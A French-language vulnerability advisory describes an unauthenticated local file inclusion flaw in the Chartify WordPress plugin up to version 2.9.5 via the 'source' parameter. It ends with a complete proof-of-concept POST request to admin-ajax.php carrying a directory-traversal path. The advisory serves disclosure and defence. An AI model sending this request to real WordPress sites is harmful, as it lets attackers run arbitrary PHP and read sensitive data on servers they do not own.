
Chartify – Plugin de graphiques WordPress <= 2.9.5 - Inclusion de fichier local non authentifiée via source
Chartify – Plugin de graphiques WordPress <= 2.9.5 - Inclusion locale de fichier non authentifiée via source
Le plugin Chartify – WordPress Chart Plugin pour WordPress est vulnérable à l'inclusion locale de fichier dans toutes les versions jusqu'à la version 2.9.5 incluse via le paramètre 'source'. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter des fichiers arbitraires sur le serveur, permettant l'exécution de tout code PHP dans ces fichiers. Cela peut être utilisé pour contourner les contrôles d'accès, obtenir des données sensibles ou parvenir à une exécution de code dans les cas où des images et d'autres types de fichiers « sûrs » peuvent être téléchargés et inclus.
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../../../var/www/html/poc&type=chart-js HTTP/1.1
Host: wp.local
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
action=ays_chart_admin_ajax&function=display_plugin_charts_page